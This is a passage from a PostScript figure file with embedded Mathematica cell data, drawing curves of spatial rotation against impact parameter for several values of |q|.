+%QA8e6OU97//rAnrwYHLMQnO/8+jBAzuN2Ffz49GDD51Z043Uz6EHH4pWm9hV +%xqEHH2xcSooen0EPPviOq4qMj0UPPvz++Oyp4Bj04EOL+Pkjz2j04ANv7Mnz +%S06jBx/e39qvNysKPfhwNXFzoP4p9ODDwI2cbdqR6MGH7sTqPZKT6MGHhfXb +%U4Qn0IMPnBmH7vIj0EMAq41/1RMeRw95H+HsrSk6hh7yvm3oYq/mUfQQwOxr +%Goa6R9BDAAvVHhobHEYPAUStdHY0PYQeAvC3t/BadhA95H3Rp7YNWw6ghwDq +%0z1WHNqPHvK+4tIo3Sv70EMAWrmRr/8LRw/550e/elgVhh5CMPUKuCAIQw8h +%KJtHjTHaix5CmB5XHr5yD3oIoWMo6tvRUPSQ/66asD7vQQh6CKH1jmpCQzB6 +%yPve/KHfdYLRQwgjuLVrXf9ADyE070v5cCoIPYTAE1otfxuIHvLXHZJPgkD0 +%EELgUNYU693oIYSWRP+CE7vQQxWKwtR4H3eihyo8d24pH7kTPVTB0WNayNoA +%9FCFsoHWTyk70EMV3EadujOwHT1UITmj09lmO3qowqHbK9IT/NFDFe6daE5s +%24YeqpB9vcHccht6qAIj2/fART/0UAWf6kSVHl/0UIUd43LWO/mihxp4KU27 +%mroVPdSgpj/EUbQVPdRgha5+yLYt6KEGUxP4IR83o4caXPnlatjszeihBluP +%hYYnbEIPNfBxel7F3oQearDD8V2o30b0UAP/htBzn33QQw02xD6KsPRBD/l8 +%0pd8u7sBPdRgVohV44QN6KEGUZ1/x8StRw91UJ+496lgPXqoQ16/m/9eb/RQ +%h1yp6Oz3deihDtlHvlpuXYce6mDIH7GxZi16qIPrScsBz7XooQ6/apV1lHih +%hzqUelUGunmhhzpIh91eWLQGPdRBP6NUe8Ua9JC/P+1V2WdP9FCH56OFD1d5 +%oocIGkbYnilfjfWIwFaTKd6wGn1E4P6x41GTB9YngtEtYck7PdBLBKmGUZVD +%q7BeETzYdsLh6Cr0E4Gnw+bKYauwfvn9xBdNl1eipwgkqcojDVZiHiIw0ro1 +%IJPv44rfMyKwV7pB7N0xHxFsX5yQXOaG3iLomLbXdIcb5iWCvz6Gf+W4Yf8g +%Am1vm8rzKzA/EUQZ5hwwXIHrQQRZDDXH18sxTxEEly177rkc14cI9qyWru11 +%xXxFkGtmuyDaFdeLCFaGul+f7op5i2B+t8+iTBdcPyJghbWKNrhg/iLYrR+s +%z3bB9SSCfQdYrleXoYcY1vXPyzFbhh5iOJq+p6bKGT3EUN68J+uQM3qIQbfY +%Y/RkZ/QQg1bqf5ffOqGHGD7pbyzb5oQeYuAtyPDVdEIPMawqGHPrsSN6iGFj +%+pHCtY7oIYZXupeyhI74fZO/n6/E/99S9BCD2vclh1ctRQ8xGD0ouMVdih5i +%MEzJHrjtgB5iEPeWtXs4oIe83mEuSUIH9BBDQo/6uIf26CGff2ZjyAZ79BDD +%jTDueE179BDD6+E1rS/t0EMMA8t6L++yQw8xtB62ZE6yQw/5eAHLm4ps0UMM +%Q580QyJs0UMMe6b9dgxs0UMCV3b01HXYoIcEbK80ZF+zQQ8JtAUVqnjYoIcE +%fHXemAyzQQ8JnHKZfSvTGj3k9x9ywvZZo4cE1v7x7tbv1ughgUxVu/Z2K/SQ +%wNQPX1JuWKGHBIxkxhnrrdBDAmXujdN/sUIPCSwxWGBesgQ9JHDd5eTss0vQ +%QwLvh5+86rwEPSTAMTh/TLIEPSTwarePT/Zi9JDAv4bxlScWo4cEsk5PLbBZ +%jB4SsOHMSRIuRg8JpD4dpvfWEj0k8LHZ+EiEJXpIYNSdDeNsLdFDAj47Hqap +%W6KHBLT0nmrnLEIPCVSY6dZHL0IPKVwNFX5zWYQeUri7eIqR9iL0kAJX/1dG +%qQV6SOHI5CneVyzQQwqhST1nfSzQQz7eVqn1dAv0kAJ71ZOTneboIYXHN71M +%HpmjhxQcnGM37DNHDymEWNx3tDJHDynMGLHAV2qOHlK4b7x8eLEZekjB7eMx +%vatm6CEFE+ulwVvN0EMKKddI0Gwz9JCC8dncCqYZekjB1W+4yduF6CGFywfW +%jDq7ED2kwGl69mjtQvSQwuDe2rIZC9FDCtWnvEIHTNFD/vwt7/a+MUUPKVjH +%6XLiTNFDCn9kjvmwzhQ9pFD4yiXfyBQ9NGCbumUmU/76/4f9glI= +% "]]}}, +% AspectRatio->NCache[GoldenRatio^(-1), 0.6180339887498948], +% Axes->None, +% AxesOrigin->{0, 0}, +% Epilog->{ +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.02\"", TraditionalForm]], "Text", "TR"], +% Text["|q| = 0.02"]], TraditionalForm]], {0.8, 4}, BaseStyle \ +%-> 14], +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.05\"", TraditionalForm]], "Text", "TR"], +% Text["|q| = 0.05"]], TraditionalForm]], {1.67, 6.4}, \ +%BaseStyle -> 14], +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.07\"", TraditionalForm]], "Text", "TR"], +% Text["|q| = 0.07"]], TraditionalForm]], {2.85, 12}, \ +%BaseStyle -> 14], +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.1\"", TraditionalForm]], "Text", "TR"], \ +% +% Text["|q| = 0.1"]], TraditionalForm]], {3.2, 7}, BaseStyle \ +%-> 14], Null}, +% Frame->True, +% FrameLabel->{ +% FormBox["\"Impact parameter, b\"", TraditionalForm], +% FormBox["\"Spatial rotation, \[Chi]\"", TraditionalForm]}, +% FrameStyle->{{14, +% GrayLevel[1]}, {14, +% GrayLevel[1]}}, +% FrameTicks->{Automatic, {{0, +% FormBox["0", TraditionalForm]}, { +% NCache[Pi, 3.141592653589793], +% FormBox["\[Pi]", TraditionalForm]}, { +% NCache[2 Pi, 6.283185307179586], +% FormBox[ +% RowBox[{"2", " ", "\[Pi]"}], TraditionalForm]}, { +% NCache[3 Pi, 9.42477796076938], +% FormBox[ +% RowBox[{"3", " ", "\[Pi]"}], TraditionalForm]}, { +% NCache[4 Pi, 12.566370614359172`], +% FormBox[ +% RowBox[{"4", " ", "\[Pi]"}], TraditionalForm]}}}, +% FrameTicksStyle->{16, 16}, +% ImageSize->600, +% PlotRange->{All, All}, +% PlotRangeClipping->True, +% PlotRangePadding->{Automatic, Automatic}, +% TicksStyle->16]], "Output", +% CellChangeTimes->{3.556953242036603*^9, {3.556953596625984*^9, \ +%3.556953702375863*^9}, {3.556953796337514*^9, 3.556953956593231*^9}, \ +%{3.556954020687426*^9, 3.556954030706046*^9}, { +% 3.558693364370013*^9, 3.5586933829491863`*^9}, \ +%{3.55869345851305*^9, 3.5586934742140837`*^9}}] +%%EndMathematicaCell +p +np 33 1 m +33 273 L +469 273 L +469 1 L +cp +clip np +p +np 35 3 m +35 271 L +467 271 L +467 3 L +cp +clip np +3.239 setmiterlimit +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +P +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +P +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +0 g +0.36 w +[ ] 0 setdash +3.25 setmiterlimit +78.19 226.892 m +78.919 226.724 L +79.648 226.555 L +80.376 226.386 L +81.105 226.217 L +81.834 226.048 L +82.562 225.878 L +83.291 225.707 L +84.02 225.537 L +84.749 225.366 L +85.477 225.194 L +86.206 225.022 L +86.935 224.85 L +87.663 224.678 L +88.392 224.505 L +89.121 224.331 L +89.849 224.158 L +90.578 223.984 L +91.307 223.809 L +92.035 223.635 L +92.764 223.459 L +93.493 223.284 L +94.221 223.108 L +94.95 222.932 L +95.679 222.755 L +96.407 222.578 L +97.136 222.4 L +97.865 222.222 L +98.593 222.044 L +99.322 221.865 L +100.051 221.686 L +100.779 221.507 L +101.508 221.327 L +102.237 221.147 L +102.965 220.966 L +103.694 220.785 L +104.423 220.604 L +105.152 220.422 L +105.88 220.24 L +106.609 220.057 L +107.338 219.874 L +108.066 219.691 L +108.795 219.507 L +109.524 219.323 L +110.252 219.138 L +110.981 218.953 L +111.71 218.767 L +112.438 218.581 L +113.167 218.395 L +113.896 218.208 L +114.624 218.021 L +115.353 217.833 L +116.082 217.645 L +116.81 217.457 L +117.539 217.268 L +118.268 217.078 L +118.996 216.889 L +119.725 216.698 L +120.454 216.508 L +121.182 216.316 L +121.911 216.125 L +122.64 215.933 L +123.368 215.74 L +124.097 215.547 L +124.826 215.354 L +125.554 215.16 L +126.283 214.965 L +127.012 214.77 L +127.741 214.575 L +128.469 214.379 L +129.198 214.183 L +129.927 213.986 L +130.655 213.789 L +131.384 213.591 L +132.113 213.392 L +132.841 213.194 L +133.57 212.994 L +134.299 212.794 L +135.027 212.594 L +135.756 212.393 L +136.485 212.192 L +137.213 211.99 L +137.942 211.787 L +138.671 211.584 L +139.399 211.38 L +140.128 211.176 L +140.857 210.972 L +141.585 210.766 L +142.314 210.56 L +143.043 210.354 L +143.771 210.147 L +144.5 209.939 L +145.229 209.731 L +145.957 209.522 L +146.686 209.313 L +147.415 209.103 L +148.144 208.893 L +148.872 208.681 L +149.601 208.47 L +150.33 208.257 L +151.058 208.044 L +151.787 207.83 L +152.516 207.616 L +153.244 207.401 L +153.973 207.185 L +154.702 206.969 L +155.43 206.752 L +156.159 206.534 L +156.888 206.316 L +157.616 206.097 L +158.345 205.877 L +159.074 205.656 L +159.802 205.435 L +160.531 205.213 L +161.26 204.99 L +161.988 204.767 L +162.717 204.542 L +163.446 204.317 L +164.174 204.092 L +164.903 203.865 L +165.632 203.638 L +166.36 203.409 L +167.089 203.181 L +167.818 202.951 L +168.547 202.72 L +169.275 202.489 L +170.004 202.256 L +170.733 202.023 L +171.461 201.789 L +172.19 201.554 L +172.919 201.318 L +173.647 201.081 L +174.376 200.844 L +175.105 200.605 L +175.833 200.365 L +176.562 200.125 L +177.291 199.883 L +178.019 199.641 L +178.748 199.397 L +179.477 199.153 L +180.205 198.907 L +180.934 198.661 L +181.663 198.413 L +182.391 198.164 L +183.12 197.914 L +183.849 197.664 L +184.577 197.412 L +185.306 197.158 L +186.035 196.904 L +186.763 196.649 L +187.492 196.392 L +188.221 196.134 L +188.95 195.875 L +189.678 195.615 L +190.407 195.353 L +191.136 195.091 L +191.864 194.826 L +192.593 194.561 L +193.322 194.294 L +194.05 194.026 L +194.779 193.757 L +195.508 193.486 L +196.236 193.214 L +196.965 192.94 L +197.694 192.665 L +198.422 192.388 L +199.151 192.11 L +199.88 191.83 L +200.608 191.549 L +201.337 191.266 L +202.066 190.981 L +202.794 190.695 L +203.523 190.408 L +204.252 190.118 L +204.98 189.827 L +205.709 189.534 L +206.438 189.239 L +207.166 188.942 L +207.895 188.644 L +208.624 188.343 L +209.353 188.041 L +210.081 187.737 L +210.81 187.43 L +211.539 187.122 L +212.267 186.811 L +212.996 186.499 L +213.725 186.184 L +214.453 185.867 L +215.182 185.548 L +215.911 185.226 L +216.639 184.903 L +217.368 184.576 L +218.097 184.248 L +218.825 183.917 L +219.554 183.583 L +220.283 183.247 L +221.011 182.908 L +221.74 182.566 L +222.469 182.221 L +223.197 181.874 L +223.926 181.524 L +224.655 181.171 L +225.383 180.815 L +226.112 180.455 L +226.841 180.093 L +227.569 179.727 L +228.298 179.358 L +229.027 178.986 L +229.756 178.61 L +230.484 178.23 L +231.213 177.847 L +231.942 177.46 L +232.67 177.069 L +233.399 176.674 L +234.128 176.276 L +234.856 175.872 L +235.585 175.465 L +236.314 175.053 L +237.042 174.637 L +237.771 174.216 L +238.5 173.79 L +239.228 173.359 L +239.957 172.924 L +240.686 172.482 L +241.414 172.036 L +242.143 171.584 L +242.872 171.126 L +243.6 170.662 L +244.329 170.192 L +245.058 169.716 L +245.786 169.233 L +246.515 168.744 L +247.244 168.247 L +247.972 167.743 L +248.701 167.232 L +249.43 166.713 L +250.159 166.186 L +250.887 165.65 L +251.616 165.106 L +252.345 164.553 L +253.073 163.99 L +253.802 163.417 L +254.531 162.834 L +255.259 162.241 L +255.988 161.636 L +256.717 161.02 L +257.445 160.391 L +258.174 159.75 L +258.903 159.095 L +259.631 158.426 L +260.36 157.743 L +261.089 157.044 L +261.817 156.328 L +262.546 155.595 L +263.275 154.844 L +264.003 154.074 L +264.732 153.283 L +265.461 152.471 L +266.189 151.635 L +266.918 150.774 L +267.647 149.887 L +268.375 148.972 L +269.104 148.026 L +269.833 147.047 L +270.561 146.033 L +271.29 144.98 L +272.019 143.886 L +272.748 142.746 L +273.476 141.556 L +274.205 140.31 L +274.934 139.004 L +275.662 137.63 L +276.391 136.179 L +277.12 134.642 L +277.848 133.005 L +278.577 131.258 L +279.306 129.378 L +280.034 127.344 L +280.763 125.125 L +281.492 122.683 L +282.22 119.959 L +282.949 116.88 L +283.678 113.326 L +284.406 109.112 L +285.135 103.916 L +285.864 97.083 L +286.592 86.986 L +287.321 66.511 L +288.05 107.215 L +288.778 120.201 L +289.507 125.455 L +290.236 128.764 L +290.964 131.167 L +291.693 133.043 L +292.422 134.577 L +293.151 135.87 L +293.879 136.983 L +294.608 137.958 L +295.337 138.825 L +296.065 139.602 L +296.794 140.306 L +297.523 140.948 L +298.251 141.537 L +298.98 142.081 L +299.709 142.585 L +300.437 143.054 L +301.166 143.493 L +301.895 143.904 L +302.623 144.291 L +303.352 144.655 L +304.081 145 L +304.809 145.327 L +305.538 145.636 L +306.267 145.931 L +306.995 146.212 L +307.724 146.479 L +308.453 146.735 L +309.181 146.98 L +309.91 147.214 L +310.639 147.439 L +311.367 147.655 L +312.096 147.863 L +312.825 148.062 L +313.554 148.255 L +314.282 148.44 L +315.011 148.619 L +315.74 148.792 L +316.468 148.959 L +317.197 149.12 L +317.926 149.276 L +318.654 149.427 L +319.383 149.574 L +320.112 149.716 L +320.84 149.853 L +321.569 149.987 L +322.298 150.117 L +323.026 150.243 L +323.755 150.366 L +324.484 150.485 L +325.212 150.601 L +325.941 150.713 L +326.67 150.823 L +327.398 150.93 L +328.127 151.035 L +328.856 151.136 L +329.584 151.235 L +330.313 151.332 L +331.042 151.426 L +331.77 151.518 L +332.499 151.608 L +333.228 151.696 L +333.957 151.782 L +334.685 151.866 L +335.414 151.948 L +336.143 152.028 L +336.871 152.106 L +337.6 152.183 L +338.329 152.258 L +339.057 152.331 L +339.786 152.403 L +340.515 152.474 L +341.243 152.542 L +341.972 152.61 L +342.701 152.676 L +343.429 152.741 L +344.158 152.805 L +344.887 152.867 L +345.615 152.928 L +346.344 152.988 L +347.073 153.047 L +347.801 153.105 L +348.53 153.161 L +349.259 153.217 L +349.987 153.271 L +350.716 153.325 L +351.445 153.377 L +352.173 153.429 L +352.902 153.48 L +353.631 153.53 L +354.36 153.579 L +355.088 153.627 L +355.817 153.674 L +356.546 153.721 L +357.274 153.766 L +358.003 153.811 L +358.732 153.855 L +359.46 153.899 L +360.189 153.942 L +360.918 153.984 L +361.646 154.025 L +362.375 154.066 L +363.104 154.106 L +363.832 154.145 L +364.561 154.184 L +365.29 154.222 L +366.018 154.26 L +366.747 154.297 L +367.476 154.333 L +368.204 154.369 L +368.933 154.405 L +369.662 154.44 L +370.39 154.474 L +371.119 154.508 L +371.848 154.541 L +372.576 154.574 L +373.305 154.606 L +374.034 154.638 L +374.763 154.669 L +375.491 154.7 L +376.22 154.731 L +376.949 154.761 L +377.677 154.791 L +378.406 154.82 L +379.135 154.849 L +379.863 154.877 L +380.592 154.905 L +381.321 154.933 L +382.049 154.96 L +382.778 154.987 L +383.507 155.014 L +384.235 155.04 L +384.964 155.066 L +385.693 155.092 L +386.421 155.117 L +387.15 155.142 L +387.879 155.166 L +388.607 155.19 L +389.336 155.214 L +390.065 155.238 L +390.793 155.261 L +391.522 155.284 L +392.251 155.307 L +392.979 155.33 L +393.708 155.352 L +394.437 155.374 L +395.166 155.395 L +395.894 155.417 L +396.623 155.438 L +397.352 155.458 L +398.08 155.479 L +398.809 155.499 L +399.538 155.519 L +400.266 155.539 L +400.995 155.559 L +401.724 155.578 L +402.452 155.597 L +403.181 155.616 L +403.91 155.635 L +404.638 155.653 L +405.367 155.672 L +406.096 155.69 L +406.824 155.708 L +407.553 155.725 L +408.282 155.743 L +409.01 155.76 L +409.739 155.777 L +410.468 155.794 L +411.196 155.811 L +411.925 155.827 L +412.654 155.843 L +413.382 155.859 L +414.111 155.875 L +414.84 155.891 L +415.568 155.907 L +416.297 155.922 L +417.026 155.937 L +417.755 155.952 L +418.483 155.967 L +419.212 155.982 L +419.941 155.997 L +420.669 156.011 L +421.398 156.025 L +422.127 156.04 L +422.855 156.054 L +423.584 156.067 L +424.313 156.081 L +425.041 156.095 L +425.77 156.108 L +426.499 156.121 L +427.227 156.135 L +427.956 156.148 L +428.685 156.16 L +429.413 156.173 L +430.142 156.186 L +430.871 156.198 L +431.599 156.211 L +432.328 156.223 L +433.057 156.235 L +433.785 156.247 L +434.514 156.259 L +435.243 156.271 L +435.971 156.282 L +436.7 156.294 L +437.429 156.305 L +438.158 156.316 L +438.886 156.328 L +439.615 156.339 L +440.344 156.35 L +441.072 156.36 L +441.801 156.371 L +442.53 156.382 L +s +78.19 227.244 m +78.919 227.062 L +79.648 226.879 L +80.376 226.696 L +81.105 226.513 L +81.834 226.329 L +82.562 226.144 L +83.291 225.96 L +84.02 225.774 L +84.749 225.589 L +85.477 225.403 L +86.206 225.216 L +86.935 225.029 L +87.663 224.842 L +88.392 224.654 L +89.121 224.465 L +89.849 224.277 L +90.578 224.088 L +91.307 223.898 L +92.035 223.708 L +92.764 223.518 L +93.493 223.327 L +94.221 223.135 L +94.95 222.944 L +95.679 222.751 L +96.407 222.559 L +97.136 222.366 L +97.865 222.172 L +98.593 221.978 L +99.322 221.783 L +100.051 221.589 L +100.779 221.393 L +101.508 221.197 L +102.237 221.001 L +102.965 220.804 L +103.694 220.607 L +104.423 220.409 L +105.152 220.211 L +105.88 220.013 L +106.609 219.813 L +107.338 219.614 L +108.066 219.414 L +108.795 219.213 L +109.524 219.012 L +110.252 218.811 L +110.981 218.609 L +111.71 218.406 L +112.438 218.203 L +113.167 217.999 L +113.896 217.795 L +114.624 217.591 L +115.353 217.386 L +116.082 217.18 L +116.81 216.974 L +117.539 216.767 L +118.268 216.56 L +118.996 216.352 L +119.725 216.144 L +120.454 215.935 L +121.182 215.726 L +121.911 215.516 L +122.64 215.305 L +123.368 215.094 L +124.097 214.883 L +124.826 214.67 L +125.554 214.458 L +126.283 214.244 L +127.012 214.03 L +127.741 213.816 L +128.469 213.6 L +129.198 213.385 L +129.927 213.168 L +130.655 212.951 L +131.384 212.733 L +132.113 212.515 L +132.841 212.296 L +133.57 212.076 L +134.299 211.856 L +135.027 211.635 L +135.756 211.413 L +136.485 211.191 L +137.213 210.968 L +137.942 210.744 L +138.671 210.52 L +139.399 210.294 L +140.128 210.068 L +140.857 209.842 L +141.585 209.614 L +142.314 209.386 L +143.043 209.157 L +143.771 208.927 L +144.5 208.697 L +145.229 208.466 L +145.957 208.234 L +146.686 208.001 L +147.415 207.767 L +148.144 207.532 L +148.872 207.297 L +149.601 207.06 L +150.33 206.823 L +151.058 206.585 L +151.787 206.346 L +152.516 206.106 L +153.244 205.865 L +153.973 205.623 L +154.702 205.381 L +155.43 205.137 L +156.159 204.892 L +156.888 204.646 L +157.616 204.4 L +158.345 204.152 L +159.074 203.903 L +159.802 203.653 L +160.531 203.402 L +161.26 203.15 L +161.988 202.897 L +162.717 202.643 L +163.446 202.387 L +164.174 202.131 L +164.903 201.873 L +165.632 201.614 L +166.36 201.354 L +167.089 201.092 L +167.818 200.83 L +168.547 200.565 L +169.275 200.3 L +170.004 200.033 L +170.733 199.765 L +171.461 199.496 L +172.19 199.225 L +172.919 198.953 L +173.647 198.68 L +174.376 198.405 L +175.105 198.128 L +175.833 197.85 L +176.562 197.57 L +177.291 197.289 L +178.019 197.006 L +178.748 196.722 L +179.477 196.435 L +180.205 196.148 L +180.934 195.858 L +181.663 195.567 L +182.391 195.274 L +183.12 194.979 L +183.849 194.682 L +184.577 194.383 L +185.306 194.083 L +186.035 193.78 L +186.763 193.475 L +187.492 193.169 L +188.221 192.86 L +188.95 192.549 L +189.678 192.236 L +190.407 191.921 L +191.136 191.603 L +191.864 191.284 L +192.593 190.961 L +193.322 190.637 L +194.05 190.31 L +194.779 189.98 L +195.508 189.648 L +196.236 189.313 L +196.965 188.976 L +197.694 188.635 L +198.422 188.292 L +199.151 187.946 L +199.88 187.598 L +200.608 187.246 L +201.337 186.891 L +202.066 186.533 L +202.794 186.171 L +203.523 185.807 L +204.252 185.438 L +204.98 185.067 L +205.709 184.692 L +206.438 184.313 L +207.166 183.93 L +207.895 183.544 L +208.624 183.153 L +209.353 182.759 L +210.081 182.36 L +210.81 181.957 L +211.539 181.549 L +212.267 181.137 L +212.996 180.72 L +213.725 180.299 L +214.453 179.872 L +215.182 179.44 L +215.911 179.003 L +216.639 178.56 L +217.368 178.112 L +218.097 177.657 L +218.825 177.197 L +219.554 176.73 L +220.283 176.257 L +221.011 175.777 L +221.74 175.29 L +222.469 174.796 L +223.197 174.295 L +223.926 173.785 L +224.655 173.268 L +225.383 172.742 L +226.112 172.207 L +226.841 171.662 L +227.569 171.109 L +228.298 170.546 L +229.027 169.971 L +229.756 169.387 L +230.484 168.79 L +231.213 168.182 L +231.942 167.561 L +232.67 166.927 L +233.399 166.28 L +234.128 165.617 L +234.856 164.94 L +235.585 164.246 L +236.314 163.535 L +237.042 162.806 L +237.771 162.058 L +238.5 161.289 L +239.228 160.499 L +239.957 159.686 L +240.686 158.848 L +241.414 157.985 L +242.143 157.093 L +242.872 156.17 L +243.6 155.216 L +244.329 154.226 L +245.058 153.198 L +245.786 152.13 L +246.515 151.016 L +247.244 149.854 L +247.972 148.638 L +248.701 95.265 L +249.43 93.925 L +250.159 92.513 L +250.887 91.021 L +251.616 89.437 L +252.345 87.751 L +253.073 85.948 L +253.802 84.008 L +254.531 81.914 L +255.259 79.635 L +255.988 77.137 L +256.717 74.37 L +257.445 71.271 L +258.174 67.749 L +258.903 63.665 L +259.631 58.799 L +260.36 52.774 L +261.089 44.836 L +261.817 33.16 L +262.546 10.25 L +263.275 102.86 L +264.003 118.171 L +264.732 124.159 L +265.461 127.877 L +266.189 130.553 L +266.918 132.626 L +267.647 134.311 L +268.375 135.722 L +269.104 136.932 L +269.833 137.986 L +270.561 138.919 L +271.29 139.753 L +272.019 140.505 L +272.748 141.189 L +273.476 141.814 L +274.205 142.389 L +274.934 142.921 L +275.662 143.415 L +276.391 143.875 L +277.12 144.305 L +277.848 144.709 L +278.577 145.088 L +279.306 145.446 L +280.034 145.784 L +280.763 146.105 L +281.492 146.409 L +282.22 146.698 L +282.949 146.973 L +283.678 147.236 L +284.406 147.486 L +285.135 147.726 L +285.864 147.955 L +286.592 148.175 L +287.321 148.386 L +288.05 148.589 L +288.778 148.784 L +289.507 148.972 L +290.236 149.152 L +290.964 149.327 L +291.693 149.495 L +292.422 149.657 L +293.151 149.814 L +293.879 149.965 L +294.608 150.112 L +295.337 150.254 L +296.065 150.392 L +296.794 150.525 L +297.523 150.654 L +298.251 150.78 L +298.98 150.901 L +299.709 151.02 L +300.437 151.135 L +301.166 151.246 L +301.895 151.355 L +302.623 151.46 L +303.352 151.563 L +304.081 151.663 L +304.809 151.761 L +305.538 151.856 L +306.267 151.949 L +306.995 152.039 L +307.724 152.127 L +308.453 152.213 L +309.181 152.297 L +309.91 152.379 L +310.639 152.459 L +311.367 152.537 L +312.096 152.613 L +312.825 152.688 L +313.554 152.761 L +314.282 152.832 L +315.011 152.902 L +315.74 152.97 L +316.468 153.037 L +317.197 153.102 L +317.926 153.166 L +318.654 153.228 L +319.383 153.29 L +320.112 153.35 L +320.84 153.409 L +321.569 153.466 L +322.298 153.523 L +323.026 153.578 L +323.755 153.633 L +324.484 153.686 L +325.212 153.738 L +325.941 153.789 L +326.67 153.84 L +327.398 153.889 L +328.127 153.937 L +328.856 153.985 L +329.584 154.032 L +330.313 154.078 L +331.042 154.123 L +331.77 154.167 L +332.499 154.21 L +333.228 154.253 L +333.957 154.295 L +334.685 154.336 L +335.414 154.376 L +336.143 154.416 L +336.871 154.455 L +337.6 154.494 L +338.329 154.532 L +339.057 154.569 L +339.786 154.606 L +340.515 154.642 L +341.243 154.677 L +341.972 154.712 L +342.701 154.746 L +343.429 154.78 L +344.158 154.813 L +344.887 154.846 L +345.615 154.878 L +346.344 154.91 L +347.073 154.941 L +347.801 154.972 L +348.53 155.002 L +349.259 155.032 L +349.987 155.061 L +350.716 155.09 L +351.445 155.118 L +352.173 155.146 L +352.902 155.174 L +353.631 155.201 L +354.36 155.228 L +355.088 155.255 L +355.817 155.281 L +356.546 155.306 L +357.274 155.332 L +358.003 155.357 L +358.732 155.381 L +359.46 155.406 L +360.189 155.43 L +360.918 155.453 L +361.646 155.476 L +362.375 155.499 L +363.104 155.522 L +363.832 155.544 L +364.561 155.567 L +365.29 155.588 L +366.018 155.61 L +366.747 155.631 L +367.476 155.652 L +368.204 155.672 L +368.933 155.693 L +369.662 155.713 L +370.39 155.733 L +371.119 155.752 L +371.848 155.772 L +372.576 155.791 L +373.305 155.81 L +374.034 155.828 L +374.763 155.847 L +375.491 155.865 L +376.22 155.883 L +376.949 155.9 L +377.677 155.918 L +378.406 155.935 L +379.135 155.952 L +379.863 155.969 L +380.592 155.986 L +381.321 156.002 L +382.049 156.018 L +382.778 156.034 L +383.507 156.05 L +384.235 156.066 L +384.964 156.081 L +385.693 156.097 L +386.421 156.112 L +387.15 156.127 L +387.879 156.141 L +388.607 156.156 L +389.336 156.171 L +390.065 156.185 L +390.793 156.199 L +391.522 156.213 L +392.251 156.227 L +392.979 156.24 L +393.708 156.254 L +394.437 156.267 L +395.166 156.28 L +395.894 156.293 L +396.623 156.306 L +397.352 156.319 L +398.08 156.331 L +398.809 156.344 L +399.538 156.356 L +400.266 156.368 L +400.995 156.38 L +401.724 156.392 L +402.452 156.404 L +403.181 156.416 L +403.91 156.427 L +404.638 156.439 L +405.367 156.45 L +406.096 156.461 L +406.824 156.472 L +407.553 156.483 L +408.282 156.494 L +409.01 156.505 L +409.739 156.515 L +410.468 156.526 L +411.196 156.536 L +411.925 156.546 L +412.654 156.557 L +413.382 156.567 L +414.111 156.577 L +414.84 156.587 L +415.568 156.596 L +416.297 156.606 L +417.026 156.616 L +417.755 156.625 L +418.483 156.634 L +419.212 156.644 L +419.941 156.653 L +420.669 156.662 L +421.398 156.671 L +422.127 156.68 L +422.855 156.689 L +423.584 156.697 L +424.313 156.706 L +425.041 156.715 L +425.77 156.723 L +426.499 156.732 L +427.227 156.74 L +427.956 156.748 L +428.685 156.756 L +429.413 156.764 L +430.142 156.772 L +430.871 156.78 L +431.599 156.788 L +432.328 156.796 L +433.057 156.804 L +433.785 156.811 L +434.514 156.819 L +435.243 156.826 L +435.971 156.834 L +436.7 156.841 L +437.429 156.849 L +438.158 156.856 L +438.886 156.863 L +439.615 156.87 L +440.344 156.877 L +441.072 156.884 L +441.801 156.891 L +442.53 156.898 L +s +78.19 227.796 m +78.555 227.699 L +78.919 227.602 L +79.283 227.504 L +79.648 227.407 L +80.012 227.309 L +80.376 227.211 L +80.741 227.113 L +81.105 227.016 L +81.469 226.917 L +81.834 226.819 L +82.198 226.721 L +82.562 226.622 L +82.927 226.524 L +83.291 226.425 L +83.655 226.327 L +84.02 226.228 L +84.384 226.129 L +84.749 226.03 L +85.113 225.93 L +85.477 225.831 L +85.842 225.732 L +86.206 225.632 L +86.57 225.532 L +86.935 225.433 L +87.299 225.333 L +87.663 225.233 L +88.028 225.133 L +88.392 225.032 L +88.756 224.932 L +89.121 224.832 L +89.485 224.731 L +89.849 224.63 L +90.214 224.53 L +90.578 224.429 L +90.942 224.328 L +91.307 224.227 L +91.671 224.125 L +92.035 224.024 L +92.4 223.923 L +92.764 223.821 L +93.128 223.719 L +93.493 223.618 L +93.857 223.516 L +94.221 223.414 L +94.586 223.311 L +94.95 223.209 L +95.314 223.107 L +95.679 223.004 L +96.043 222.902 L +96.407 222.799 L +96.772 222.696 L +97.136 222.593 L +97.5 222.49 L +97.865 222.387 L +98.229 222.284 L +98.593 222.18 L +98.958 222.077 L +99.322 221.973 L +99.686 221.869 L +100.051 221.765 L +100.415 221.661 L +100.779 221.557 L +101.144 221.453 L +101.508 221.349 L +101.872 221.244 L +102.237 221.14 L +102.601 221.035 L +102.965 220.93 L +103.33 220.825 L +103.694 220.72 L +104.058 220.615 L +104.423 220.51 L +104.787 220.404 L +105.152 220.299 L +105.516 220.193 L +105.88 220.087 L +106.245 219.981 L +106.609 219.875 L +106.973 219.769 L +107.338 219.663 L +107.702 219.556 L +108.066 219.45 L +108.431 219.343 L +108.795 219.236 L +109.159 219.129 L +109.524 219.022 L +109.888 218.915 L +110.252 218.808 L +110.617 218.7 L +110.981 218.593 L +111.345 218.485 L +111.71 218.377 L +112.074 218.269 L +112.438 218.161 L +112.803 218.053 L +113.167 217.945 L +113.531 217.836 L +113.896 217.727 L +114.26 217.619 L +114.624 217.51 L +114.989 217.401 L +115.353 217.291 L +115.717 217.182 L +116.082 217.073 L +116.446 216.963 L +116.81 216.853 L +117.175 216.743 L +117.539 216.633 L +117.903 216.523 L +118.268 216.413 L +118.632 216.303 L +118.996 216.192 L +119.361 216.081 L +119.725 215.97 L +120.089 215.859 L +120.454 215.748 L +120.818 215.637 L +121.182 215.525 L +121.547 215.414 L +121.911 215.302 L +122.275 215.19 L +122.64 215.078 L +123.004 214.965 L +123.368 214.853 L +123.733 214.74 